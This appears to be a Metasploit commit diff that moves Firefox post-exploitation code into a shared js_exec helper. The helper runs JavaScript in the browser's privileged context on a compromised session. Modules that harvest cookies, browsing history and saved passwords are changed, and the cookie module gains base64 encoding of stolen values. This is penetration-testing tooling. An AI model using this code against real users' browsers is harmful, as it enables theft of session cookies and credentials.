Refactors firefox js usage into a mixin.

2014-04-24 15:07:48 -05:00 · 2014-04-24 15:07:48 -05:00 · f94d1f6546
parent 1353c62967
commit f94d1f6546
6 changed files with 23 additions and 19 deletions
--- a/lib/msf/core/exploit/remote/firefox_privilege_escalation.rb
+++ b/lib/msf/core/exploit/remote/firefox_privilege_escalation.rb
@ -9,7 +9,17 @@

 module Msf
 module Exploit::Remote::FirefoxPrivilegeEscalation
-  
+
+  # Sends the +js+ code to the remote session, which executes it in Firefox's
+  # privileged javascript context
+  # @return [String] the results that were sent back. This can be achieved through
+  #   calling the "send" function, or by just returning the value in +js+
+  def js_exec(js)
+    print_status "Running the privileged javascript..."
+    session.shell_write("[JAVASCRIPT]#{js}[/JAVASCRIPT]")
+    session.shell_read_until_token("[!JAVASCRIPT]", 0, datastore['TIMEOUT'])
+  end
+
  # Puts the shellcode into memory, adds X flag, and calls it
  # The js function throws on error
  # @return [String] javascript code containing the execShellcode() javascript fn
--- a/modules/exploits/android/browser/webview_addjavascriptinterface.rb
+++ b/modules/exploits/android/browser/webview_addjavascriptinterface.rb
@ -117,4 +117,4 @@ class Metasploit3 < Msf::Exploit::Remote
  def html
    "<!doctype html><html><body><script>#{js}</script></body></html>"
  end
-end
+end
--- a/modules/post/firefox/gather/cookies.rb
+++ b/modules/post/firefox/gather/cookies.rb
@ -5,11 +5,9 @@

 require 'json'
 require 'msf/core'
-require 'msf/core/payload/firefox'

 class Metasploit3 < Msf::Post

-  include Msf::Payload::Firefox
  include Msf::Exploit::Remote::FirefoxPrivilegeEscalation

  def initialize(info={})
@ -29,12 +27,14 @@ class Metasploit3 < Msf::Post
  end

  def run
-    print_status "Running the privileged javascript..."
-    session.shell_write("[JAVASCRIPT]#{js_payload}[/JAVASCRIPT]")
-    results = session.shell_read_until_token("[!JAVASCRIPT]", 0, datastore['TIMEOUT'])
+    results = js_exec(js_payload)
    if results.present?
      begin
        cookies = JSON.parse(results)
+        cookies.each do |entry|
+          entry.keys.each { |k| entry[k] = Rex::Text.decode_base64(entry[k]) }
+        end
+
        file = store_loot("firefox.cookies.json", "text/json", rhost, results)
        print_good("Saved #{cookies.length} cookies to #{file}")
      rescue JSON::ParserError => e
@ -47,6 +47,7 @@ class Metasploit3 < Msf::Post
    %Q|
      (function(send){
        try {
+          var b64 = Components.utils.import("resource://gre/modules/Services.jsm").btoa;
          var cookieManager = Components.classes["@mozilla.org/cookiemanager;1"]
                        .getService(Components.interfaces.nsICookieManager);
          var cookies = [];
@ -54,7 +55,7 @@ class Metasploit3 < Msf::Post
          while (iter.hasMoreElements()){
            var cookie = iter.getNext();
            if (cookie instanceof Components.interfaces.nsICookie){
-              cookies.push({host:cookie.host, name:cookie.name, value:cookie.value})
+              cookies.push({host:b64(cookie.host), name:b64(cookie.name), value:b64(cookie.value)})
            }
          }
          send(JSON.stringify(cookies));
--- a/modules/post/firefox/gather/history.rb
+++ b/modules/post/firefox/gather/history.rb
@ -5,11 +5,9 @@

 require 'json'
 require 'msf/core'
-require 'msf/core/payload/firefox'

 class Metasploit3 < Msf::Post

-  include Msf::Payload::Firefox
  include Msf::Exploit::Remote::FirefoxPrivilegeEscalation

  def initialize(info={})
@ -30,9 +28,7 @@ class Metasploit3 < Msf::Post
  end

  def run
-    print_status "Running the privileged javascript..."
-    session.shell_write("[JAVASCRIPT]#{js_payload}[/JAVASCRIPT]")
-    results = session.shell_read_until_token("[!JAVASCRIPT]", 0, datastore['TIMEOUT'])
+    results = js_exec(js_payload)
    if results.present?
      begin
        history = JSON.parse(results)
--- a/modules/post/firefox/gather/passwords.rb
+++ b/modules/post/firefox/gather/passwords.rb
@ -29,9 +29,7 @@ class Metasploit3 < Msf::Post
  end

  def run
-    print_status "Running the privileged javascript..."
-    session.shell_write("[JAVASCRIPT]#{js_payload}[/JAVASCRIPT]")
-    results = session.shell_read_until_token("[!JAVASCRIPT]", 0, datastore['TIMEOUT'])
+    results = js_exec(js_payload)
    if results.present?
      begin
        passwords = JSON.parse(results)
--- a/modules/post/firefox/gather/xss.rb
+++ b/modules/post/firefox/gather/xss.rb
@ -10,6 +10,7 @@ require 'msf/core/payload/firefox'
 class Metasploit3 < Msf::Post

  include Msf::Payload::Firefox
+  include Msf::Exploit::Remote::FirefoxPrivilegeEscalation

  def initialize(info={})
    super(update_info(info,
@ -36,9 +37,7 @@ class Metasploit3 < Msf::Post
  end

  def run
-    session.shell_write("[JAVASCRIPT]#{js_payload}[/JAVASCRIPT]")
-    results = session.shell_read_until_token("[!JAVASCRIPT]", 0, datastore['TIMEOUT'])
-
+    results = js_exec(js_payload)
    if results.present?
      print_good results
    else